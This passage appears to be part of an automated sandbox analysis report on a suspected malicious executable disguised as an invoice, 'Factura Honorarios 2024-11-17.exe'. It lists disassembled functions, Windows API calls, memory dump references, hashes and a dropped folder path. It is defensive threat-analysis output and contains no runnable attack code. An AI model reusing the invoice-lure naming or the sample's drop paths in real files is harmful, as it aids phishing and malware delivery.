                                                                                                                                  • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                                                                                                  Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: a534a62c68ba0751e2da4201c9068f845168481ab22296a77696cb989ecb9085
                                                                                                                                  • Instruction ID: ddf2f8c37bfc1fcb0df662674942ba22a859a8995a75fa35abd24466b818891c
                                                                                                                                  • Opcode Fuzzy Hash: a534a62c68ba0751e2da4201c9068f845168481ab22296a77696cb989ecb9085
                                                                                                                                  • Instruction Fuzzy Hash: BFD05E73F142008BD720DBB8BA8945E73A8E780319320883BE102F1191E97888524A2D

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00404C68 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00405098
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00405237
                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405249
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                  • String ID: $M$N
                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                  • Opcode ID: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
                                                                                                                                  • Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
                                                                                                                                  • Opcode Fuzzy Hash: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
                                                                                                                                  • Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58
                                                                                                                                  Function 004046EC Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                                                                                                                  • lstrcmpiW.KERNEL32(Call,004236E8,00000000,?,?), ref: 00404853
                                                                                                                                  • lstrcatW.KERNEL32(?,Call), ref: 0040485F
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                                                                                                    • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                                                                    • Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                                                                    • Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe",00403334,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                                                                                                    • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                                                                    • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                                                                                                    • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab$Call$6B
                                                                                                                                  • API String ID: 2624150263-2922200990
                                                                                                                                  • Opcode ID: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
                                                                                                                                  • Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
                                                                                                                                  • Opcode Fuzzy Hash: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
                                                                                                                                  • Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                                                                                                  Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab, xrefs: 004021C3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab
                                                                                                                                  • API String ID: 542301482-4138664628
                                                                                                                                  • Opcode ID: a149058ad8696085432c460d88ec71d3eef099888a8f5696d16856a4a3f09e5f
                                                                                                                                  • Instruction ID: 3f6190fb0288cb4cc2191ecfdaddaa4006c381b8c0a92558cc12242fdf246284
                                                                                                                                  • Opcode Fuzzy Hash: a149058ad8696085432c460d88ec71d3eef099888a8f5696d16856a4a3f09e5f
                                                                                                                                  • Instruction Fuzzy Hash: C9414B71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                                                                                                                  Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1974802433-0
                                                                                                                                  • Opcode ID: 3ff8ad76b3b9f153c7fa26eaece9520d2f538018302aa55d80a0268ba0d10728
                                                                                                                                  • Instruction ID: 42b58e9376e2aae4a6b7d1f769ff68ee5b2b2e9610aeafae56754381977d23d8
                                                                                                                                  • Opcode Fuzzy Hash: 3ff8ad76b3b9f153c7fa26eaece9520d2f538018302aa55d80a0268ba0d10728
                                                                                                                                  • Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A
                                                                                                                                  Function 004043BA Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
                                                                                                                                  • GetSysColor.USER32(?), ref: 0040449A
                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004044BB
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040453D
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004045BC
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004045D8
                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                  • String ID: 1C@$Call$N
                                                                                                                                  • API String ID: 3103080414-3974410273
                                                                                                                                  • Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                                                                  • Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
                                                                                                                                  • Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                                                                  • Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68
                                                                                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                  • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                  • String ID: F
                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                  • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                                                  • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                                                                                  • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                                                  • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                                                                                  Function 00405ED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                                                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                                                                                                  • wsprintfA.USER32 ref: 00405F4F
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                                                                                                  • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                                                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
